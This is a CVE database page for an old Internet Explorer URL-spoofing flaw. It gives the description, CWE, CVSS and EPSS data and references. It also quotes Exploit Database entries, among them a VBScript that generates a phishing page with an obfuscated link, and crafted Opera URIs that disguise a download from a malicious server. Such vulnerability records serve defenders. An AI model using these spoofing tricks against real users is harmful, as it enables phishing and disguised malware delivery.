CVE-2003-1025 : Detail

CVE-2003-1025

A03-Injection
96.78%V3
Network
2004-01-06
04h00 +00:00
2018-10-12
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Internet Explorer 5.01 through 6 SP1 allows remote attackers to spoof the domain of a URL via a "%01" character before an @ sign in the user@domain portion of the URL, which hides the rest of the URL, including the real site, in the address bar, aka the "Improper URL Canonicalization Vulnerability."

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 23422

Publication date : 2003-12-08 23h00 +00:00
Author : Guy Crumpley
EDB Verified : Yes

source: https://www.securityfocus.com/bid/9182/info A weakness has been reported in multiple browsers that may allow attackers to obfuscate the URI for a visited page. The problem is said to occur when a URI designed to pass access a specific location with a supplied username, contains a hexadecimal 1 value prior to the @ symbol. An attacker could exploit this issue by supplying a malicious URI pointing to a page designed to mimic that of a trusted site, and tricking a victim who follows a link into believing they are actually at the trusted location. On Error Resume Next PromtStart = "Do you want to create a web page to exploit Internet Explorer 5.01, 5.5 and 6.0 on Windows" _ & " platforms?" & vbcrlf & "(URL Obfuscation - https://www.securityfocus.com/bid/9182)" Ok2Run = MsgBox (PromtStart,vbyesno + vbquestion,"URL Obfuscation Web Page Creator") If Ok2Run = vbyes Then Do While strFileName = "" strFileName = InputBox ("Enter the name of the web page file you want to create","File Name","TEST.HTML") Loop Do While strSpoofSite = "" strSpoofSite = InputBox ("Enter the name of the site you want users to THINK they're going to:","Spoof Site","atkins.com") Loop Do While strRealSite = "" strRealSite = InputBox ("Enter the name of the site users WILL go to when they click on the link:","Real Site","www.mcdonalds.com") Loop Do While strLinkText = "" strLinkText = InputBox ("Enter the text you want to appear in the link:","Link Text","Go to the Atkins Site") Loop Err.Clear CreateExploitPage strFileName, strSpoofSite, strRealSite, strLinkText If Err.Number = 0 then MsgBox "Your exploit page has been saved to C:\" & strFileName & ".",vbokonly + vbinformation, "Script Complete" Else MsgBox "An error occured (" & Err.Description & ")saving your exploit page to C:\" & strFileName & ".",vbokonly + vbcritical, "Script Error" Err.Clear End if Else MsgBox "Script canceled.",vbokonly + vbcritical,"URL Obfuscation Web Page Creator" End If Sub CreateExploitPage(strFileName, strSpoofSite, strRealSite, strLinkText) Set fs = CreateObject("Scripting.FileSystemObject") Set a = fs.CreateTextFile("c:\" & strFileName, True) a.WriteLine("<HTML>") a.WriteLine("<TITLE>Exploit Page for BID 9182 (https://www.securityfocus.com/bid/9182)</TITLE>") a.WriteLine("<BODY>") strExploitLine = "<A HREF=" & Chr(34) & "http://" & strSpoofSite & Chr(1) & "%00@" & strRealSite strExploitLine = strExploitLine & Chr(34) & ">" & strLinkText & "</A>" a.WriteLine(strExploitLine) a.WriteLine("</BODY>") a.WriteLine("</HTML>") a.Close End Sub
Exploit Database EDB-ID : 23423

Publication date : 2003-12-08 23h00 +00:00
Author : Zap The Dingbat
EDB Verified : Yes

source: https://www.securityfocus.com/bid/9182/info A weakness has been reported in multiple browsers that may allow attackers to obfuscate the URI for a visited page. The problem is said to occur when a URI designed to pass access a specific location with a supplied username, contains a hexadecimal 1 value prior to the @ symbol. An attacker could exploit this issue by supplying a malicious URI pointing to a page designed to mimic that of a trusted site, and tricking a victim who follows a link into believing they are actually at the trusted location. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23423.zip
Exploit Database EDB-ID : 23465

Publication date : 2003-12-22 23h00 +00:00
Author : nesumin
EDB Verified : Yes

source: https://www.securityfocus.com/bid/9281/info A weakness has been reported in Opera that may allow attackers to obfuscate the URI for a visited page. The problem is said to occur when a URI that is designed to access a specific location with a supplied username, contains a specially crafted sequence of characters. These characters will be interpreted as a NULL due to UTF-8 encoding. This sequence may be placed as part of the username value prior to the @ symbol in the malicious URI to aid in obfuscating the URI for a visited page. An attacker could exploit this issue by supplying a malicious URI pointing to a page designed to mimic that of a trusted site, and tricking a victim who follows a link into believing they are actually at the trusted location. http://www.example.com%C0%AFfake_path%C0%AFfake_filename%C0%AEhtml%C0%[email protected]/ http://www.example.com/fake_path/fake_filename.html ftp://ftp.example.com%C0%AFpub%C0%AFopera%C0%AFwin%C0%AF723%C0%AFen%C0%AFstd%C0%AFow32enen723%C0%AEexe%C0%80:password@malicious_server/ow32enen723.exe ftp://ftp.example.com/pub/opera/win/723/en/std/ow32enen723.exe

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 6.0

References

http://www.kb.cert.org/vuls/id/652278
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/archive/1/346948
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.us-cert.gov/cas/techalerts/TA04-033A.html
Tags : third-party-advisory, x_refsource_CERT